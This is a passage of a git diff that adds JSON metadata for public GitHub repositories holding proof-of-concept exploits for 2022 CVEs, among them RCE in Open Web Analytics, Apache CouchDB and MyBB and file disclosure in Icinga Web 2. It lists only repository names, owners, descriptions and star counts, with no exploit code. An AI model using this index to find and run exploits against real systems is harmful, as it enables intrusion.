1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24637.json b/2022/CVE-2022-24637.json new file mode 100644 index 0000000000..ba7978c90a --- /dev/null +++ b/2022/CVE-2022-24637.json @@ -0,0 +1,223 @@ +[ + { + "id": 530742974, + "name": "CVE-2022-24637", + "full_name": "JacobEbben\/CVE-2022-24637", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4", + "fork": false, + "created_at": "2022-08-30T16:38:01Z", + "updated_at": "2023-03-21T17:11:09Z", + "pushed_at": "2023-03-20T14:05:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530761622, + "name": "CVE-2022-24637", + "full_name": "Lay0us\/CVE-2022-24637", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3", + "fork": false, + "created_at": "2022-08-30T17:31:14Z", + "updated_at": "2024-08-12T20:26:38Z", + "pushed_at": "2022-08-30T17:09:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548059345, + "name": "CVE-2022-24637", + "full_name": "hupe1980\/CVE-2022-24637", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2022-24637", + "description": "Open Web Analytics (OWA) - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2022-10-08T21:12:35Z", + "updated_at": "2023-10-19T18:37:03Z", + "pushed_at": "2022-10-12T17:14:54Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-24637", + "openwebanalytics", + "owa" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 566546536, + "name": "CVE-2022-24637", + "full_name": "icebreack\/CVE-2022-24637", + "owner": { + "login": "icebreack", + "id": 6855402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6855402?v=4", + "html_url": "https:\/\/github.com\/icebreack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/icebreack\/CVE-2022-24637", + "description": "FIxed exploit for CVE-2022-24637 (original xplt: https:\/\/www.exploit-db.com\/exploits\/51026)", + "fork": false, + "created_at": "2022-11-15T22:39:49Z", + "updated_at": "2024-08-12T20:28:22Z", + "pushed_at": "2022-11-15T22:57:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611686754, + "name": "CVE-2022-24637", + "full_name": "Pflegusch\/CVE-2022-24637", + "owner": { + "login": "Pflegusch", + "id": 44372539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44372539?v=4", + "html_url": "https:\/\/github.com\/Pflegusch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pflegusch\/CVE-2022-24637", + "description": "Open Web Analytics 1.7.3 - Remote Code Execution", + "fork": false, + "created_at": "2023-03-09T10:40:24Z", + "updated_at": "2023-10-19T18:37:06Z", + "pushed_at": "2023-04-08T13:58:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619163880, + "name": "CVE-2022-24637", + "full_name": "0xM4hm0ud\/CVE-2022-24637", + "owner": { + "login": "0xM4hm0ud", + "id": 80924519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80924519?v=4", + "html_url": "https:\/\/github.com\/0xM4hm0ud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xM4hm0ud\/CVE-2022-24637", + "description": "Unauthenticated RCE in Open Web Analytics version <1.7.4", + "fork": false, + "created_at": "2023-03-26T13:11:50Z", + "updated_at": "2024-08-29T19:41:23Z", + "pushed_at": "2023-03-26T13:22:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 681731098, + "name": "CVE-2022-24637", + "full_name": "0xRyuk\/CVE-2022-24637", + "owner": { + "login": "0xRyuk", + "id": 64897374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64897374?v=4", + "html_url": "https:\/\/github.com\/0xRyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRyuk\/CVE-2022-24637", + "description": "Open Web Analytics 1.7.3 - Remote Code Execution Exploit v2", + "fork": false, + "created_at": "2023-08-22T16:25:52Z", + "updated_at": "2023-09-10T11:09:48Z", + "pushed_at": "2023-08-22T16:43:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24644.json b/2022/CVE-2022-24644.json new file mode 100644 index 0000000000..6df63ae555 --- /dev/null +++ b/2022/CVE-2022-24644.json @@ -0,0 +1,64 @@ +[ + { + "id": 466229687, + "name": "cve-2022-24644", + "full_name": "gerr-re\/cve-2022-24644", + "owner": { + "login": "gerr-re", + "id": 92781905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92781905?v=4", + "html_url": "https:\/\/github.com\/gerr-re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerr-re\/cve-2022-24644", + "description": null, + "fork": false, + "created_at": "2022-03-04T18:26:35Z", + "updated_at": "2023-01-15T13:44:00Z", + "pushed_at": "2023-01-13T08:38:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499036438, + "name": "ATHDH_CVE_2022_24644", + "full_name": "ThanhThuy2908\/ATHDH_CVE_2022_24644", + "owner": { + "login": "ThanhThuy2908", + "id": 63891587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63891587?v=4", + "html_url": "https:\/\/github.com\/ThanhThuy2908", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThanhThuy2908\/ATHDH_CVE_2022_24644", + "description": "Bai cuoi ky CVE-2022-24644", + "fork": false, + "created_at": "2022-06-02T07:32:15Z", + "updated_at": "2022-06-02T07:36:37Z", + "pushed_at": "2022-06-02T07:36:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24654.json b/2022/CVE-2022-24654.json new file mode 100644 index 0000000000..f8f9722e3b --- /dev/null +++ b/2022/CVE-2022-24654.json @@ -0,0 +1,33 @@ +[ + { + "id": 523767651, + "name": "CVE-2022-24654", + "full_name": "leonardobg\/CVE-2022-24654", + "owner": { + "login": "leonardobg", + "id": 13241258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13241258?v=4", + "html_url": "https:\/\/github.com\/leonardobg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leonardobg\/CVE-2022-24654", + "description": "PoC for CVE-2022-24654", + "fork": false, + "created_at": "2022-08-11T15:06:49Z", + "updated_at": "2022-08-13T19:03:20Z", + "pushed_at": "2022-08-11T15:09:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2466.json b/2022/CVE-2022-2466.json new file mode 100644 index 0000000000..188ce4fb45 --- /dev/null +++ b/2022/CVE-2022-2466.json @@ -0,0 +1,33 @@ +[ + { + "id": 518001622, + "name": "CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "full_name": "yuxblank\/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "owner": { + "login": "yuxblank", + "id": 12859195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12859195?v=4", + "html_url": "https:\/\/github.com\/yuxblank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuxblank\/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL", + "description": null, + "fork": false, + "created_at": "2022-07-26T09:45:46Z", + "updated_at": "2022-10-16T16:12:37Z", + "pushed_at": "2022-07-26T10:56:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24675.json b/2022/CVE-2022-24675.json new file mode 100644 index 0000000000..565b31dc9e --- /dev/null +++ b/2022/CVE-2022-24675.json @@ -0,0 +1,33 @@ +[ + { + "id": 481145537, + "name": "jfrog-CVE-2022-24675", + "full_name": "jfrog\/jfrog-CVE-2022-24675", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2022-24675", + "description": null, + "fork": false, + "created_at": "2022-04-13T09:05:33Z", + "updated_at": "2022-04-13T09:31:27Z", + "pushed_at": "2022-04-13T09:31:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24693.json b/2022/CVE-2022-24693.json new file mode 100644 index 0000000000..cc71baca1a --- /dev/null +++ b/2022/CVE-2022-24693.json @@ -0,0 +1,33 @@ +[ + { + "id": 457480644, + "name": "CVE-2022-24693", + "full_name": "lukejenkins\/CVE-2022-24693", + "owner": { + "login": "lukejenkins", + "id": 15523955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15523955?v=4", + "html_url": "https:\/\/github.com\/lukejenkins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukejenkins\/CVE-2022-24693", + "description": null, + "fork": false, + "created_at": "2022-02-09T18:28:00Z", + "updated_at": "2024-11-18T21:27:50Z", + "pushed_at": "2024-11-18T21:27:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24702.json b/2022/CVE-2022-24702.json new file mode 100644 index 0000000000..1ae59bc6a0 --- /dev/null +++ b/2022/CVE-2022-24702.json @@ -0,0 +1,36 @@ +[ + { + "id": 463266133, + "name": "WinAPRS-Exploits", + "full_name": "Coalfire-Research\/WinAPRS-Exploits", + "owner": { + "login": "Coalfire-Research", + "id": 35154327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35154327?v=4", + "html_url": "https:\/\/github.com\/Coalfire-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Coalfire-Research\/WinAPRS-Exploits", + "description": "A collection of exploits, shellcode, and tools related to CVE-2022-24702", + "fork": false, + "created_at": "2022-02-24T18:53:01Z", + "updated_at": "2022-06-02T01:15:45Z", + "pushed_at": "2022-04-01T17:07:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "shell", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24706.json b/2022/CVE-2022-24706.json new file mode 100644 index 0000000000..995864dcbd --- /dev/null +++ b/2022/CVE-2022-24706.json @@ -0,0 +1,95 @@ +[ + { + "id": 494319745, + "name": "CVE-2022-24706-CouchDB-Exploit", + "full_name": "sadshade\/CVE-2022-24706-CouchDB-Exploit", + "owner": { + "login": "sadshade", + "id": 12017698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12017698?v=4", + "html_url": "https:\/\/github.com\/sadshade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sadshade\/CVE-2022-24706-CouchDB-Exploit", + "description": "Apache CouchDB 3.2.1 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-05-20T04:28:51Z", + "updated_at": "2024-08-12T20:23:25Z", + "pushed_at": "2022-05-20T04:32:13Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503274605, + "name": "Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-", + "full_name": "ahmetsabrimert\/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-", + "owner": { + "login": "ahmetsabrimert", + "id": 82470001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82470001?v=4", + "html_url": "https:\/\/github.com\/ahmetsabrimert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetsabrimert\/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-", + "description": "I wrote a blog post about Apache CouchDB CVE-2022-24706 RCE Exploits", + "fork": false, + "created_at": "2022-06-14T08:34:11Z", + "updated_at": "2024-08-22T22:03:23Z", + "pushed_at": "2022-06-14T08:34:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510182546, + "name": "CVE-2022-24706", + "full_name": "superzerosec\/CVE-2022-24706", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2022-24706", + "description": "CVE-2022-24706 POC exploit", + "fork": false, + "created_at": "2022-07-04T02:06:27Z", + "updated_at": "2022-07-04T02:06:27Z", + "pushed_at": "2022-07-04T02:06:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24707.json b/2022/CVE-2022-24707.json new file mode 100644 index 0000000000..12b0fede82 --- /dev/null +++ b/2022/CVE-2022-24707.json @@ -0,0 +1,33 @@ +[ + { + "id": 488040032, + "name": "CVE-2022-24707", + "full_name": "Altelus1\/CVE-2022-24707", + "owner": { + "login": "Altelus1", + "id": 20337489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20337489?v=4", + "html_url": "https:\/\/github.com\/Altelus1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Altelus1\/CVE-2022-24707", + "description": "PoC of CVE-2022-24707", + "fork": false, + "created_at": "2022-05-03T01:11:56Z", + "updated_at": "2024-08-12T20:22:56Z", + "pushed_at": "2022-05-03T01:12:15Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24713.json b/2022/CVE-2022-24713.json new file mode 100644 index 0000000000..27ce483b39 --- /dev/null +++ b/2022/CVE-2022-24713.json @@ -0,0 +1,33 @@ +[ + { + "id": 500224436, + "name": "CVE-2022-24713-POC", + "full_name": "ItzSwirlz\/CVE-2022-24713-POC", + "owner": { + "login": "ItzSwirlz", + "id": 24401303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24401303?v=4", + "html_url": "https:\/\/github.com\/ItzSwirlz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ItzSwirlz\/CVE-2022-24713-POC", + "description": "Proof of Concept\/Test for CVE-2022-24713 on Ubuntu", + "fork": false, + "created_at": "2022-06-05T22:17:00Z", + "updated_at": "2022-06-05T22:17:32Z", + "pushed_at": "2022-06-05T22:17:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24715.json b/2022/CVE-2022-24715.json new file mode 100644 index 0000000000..ec0d87ee7e --- /dev/null +++ b/2022/CVE-2022-24715.json @@ -0,0 +1,95 @@ +[ + { + "id": 616284623, + "name": "CVE-2022-24715", + "full_name": "JacobEbben\/CVE-2022-24715", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24715", + "description": " Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-20T04:31:32Z", + "updated_at": "2023-07-17T19:37:21Z", + "pushed_at": "2023-04-27T08:43:59Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664102574, + "name": "CVE-2022-24715", + "full_name": "cxdxnt\/CVE-2022-24715", + "owner": { + "login": "cxdxnt", + "id": 79928273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79928273?v=4", + "html_url": "https:\/\/github.com\/cxdxnt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxdxnt\/CVE-2022-24715", + "description": "Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-07-08T23:22:28Z", + "updated_at": "2023-07-09T13:33:46Z", + "pushed_at": "2023-07-09T13:44:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715006168, + "name": "CVE-2022-24715-go", + "full_name": "d4rkb0n3\/CVE-2022-24715-go", + "owner": { + "login": "d4rkb0n3", + "id": 149922113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149922113?v=4", + "html_url": "https:\/\/github.com\/d4rkb0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rkb0n3\/CVE-2022-24715-go", + "description": null, + "fork": false, + "created_at": "2023-11-06T09:44:33Z", + "updated_at": "2023-11-06T09:47:13Z", + "pushed_at": "2023-11-06T09:49:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24716.json b/2022/CVE-2022-24716.json new file mode 100644 index 0000000000..0b93c4b791 --- /dev/null +++ b/2022/CVE-2022-24716.json @@ -0,0 +1,157 @@ +[ + { + "id": 616179873, + "name": "CVE-2022-24716", + "full_name": "JacobEbben\/CVE-2022-24716", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24716", + "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-19T20:41:46Z", + "updated_at": "2023-12-07T14:08:19Z", + "pushed_at": "2023-03-27T22:46:04Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616253439, + "name": "CVE-2022-24716", + "full_name": "joaoviictorti\/CVE-2022-24716", + "owner": { + "login": "joaoviictorti", + "id": 85838827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85838827?v=4", + "html_url": "https:\/\/github.com\/joaoviictorti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaoviictorti\/CVE-2022-24716", + "description": "CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)", + "fork": false, + "created_at": "2023-03-20T02:25:55Z", + "updated_at": "2023-10-07T20:28:35Z", + "pushed_at": "2023-10-11T13:27:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619003382, + "name": "CVE-2022-24716", + "full_name": "pumpkinpiteam\/CVE-2022-24716", + "owner": { + "login": "pumpkinpiteam", + "id": 128508216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128508216?v=4", + "html_url": "https:\/\/github.com\/pumpkinpiteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pumpkinpiteam\/CVE-2022-24716", + "description": null, + "fork": false, + "created_at": "2023-03-26T01:03:07Z", + "updated_at": "2023-03-26T01:04:33Z", + "pushed_at": "2023-03-26T01:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619372624, + "name": "CVE-2022-24716", + "full_name": "doosec101\/CVE-2022-24716", + "owner": { + "login": "doosec101", + "id": 128431701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4", + "html_url": "https:\/\/github.com\/doosec101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-24716", + "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-27T02:22:23Z", + "updated_at": "2023-04-24T21:26:44Z", + "pushed_at": "2023-03-27T02:47:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643308038, + "name": "CVE-2022-24716", + "full_name": "antisecc\/CVE-2022-24716", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-24716", + "description": null, + "fork": false, + "created_at": "2023-05-20T18:43:46Z", + "updated_at": "2023-05-20T18:50:20Z", + "pushed_at": "2023-05-20T18:50:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24734.json b/2022/CVE-2022-24734.json new file mode 100644 index 0000000000..79df37d1a0 --- /dev/null +++ b/2022/CVE-2022-24734.json @@ -0,0 +1,64 @@ +[ + { + "id": 489979935, + "name": "CVE-2022-24734", + "full_name": "Altelus1\/CVE-2022-24734", + "owner": { + "login": "Altelus1", + "id": 20337489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20337489?v=4", + "html_url": "https:\/\/github.com\/Altelus1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Altelus1\/CVE-2022-24734", + "description": "CVE-2022-24734 PoC", + "fork": false, + "created_at": "2022-05-08T15:20:41Z", + "updated_at": "2024-11-15T16:44:48Z", + "pushed_at": "2022-05-08T15:23:46Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 48, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492581612, + "name": "mybb-CVE-2022-24734", + "full_name": "lavclash75\/mybb-CVE-2022-24734", + "owner": { + "login": "lavclash75", + "id": 46343695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46343695?v=4", + "html_url": "https:\/\/github.com\/lavclash75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lavclash75\/mybb-CVE-2022-24734", + "description": "MyBB 1.8.29 - Remote Code Execution", + "fork": false, + "created_at": "2022-05-15T19:18:32Z", + "updated_at": "2023-02-10T16:54:20Z", + "pushed_at": "2022-05-18T09:16:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24760.json b/2022/CVE-2022-24760.json new file mode 100644 index 0000000000..6be1491a71 --- /dev/null +++ b/2022/CVE-2022-24760.json @@ -0,0 +1,33 @@ +[ + { + "id": 476210430, + "name": "CVE-2022-24760", + "full_name": "tuo4n8\/CVE-2022-24760", + "owner": { + "login": "tuo4n8", + "id": 21272757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4", + "html_url": "https:\/\/github.com\/tuo4n8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2022-24760", + "description": null, + "fork": false, + "created_at": "2022-03-31T08:06:36Z", + "updated_at": "2023-07-13T09:42:38Z", + "pushed_at": "2022-03-31T08:10:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24780.json b/2022/CVE-2022-24780.json new file mode 100644 index 0000000000..7611d5db50 --- /dev/null +++ b/2022/CVE-2022-24780.json @@ -0,0 +1,39 @@ +[ + { + "id": 531831189, + "name": "exploit-CVE-2022-24780", + "full_name": "Acceis\/exploit-CVE-2022-24780", + "owner": { + "login": "Acceis", + "id": 34159431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34159431?v=4", + "html_url": "https:\/\/github.com\/Acceis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acceis\/exploit-CVE-2022-24780", + "description": 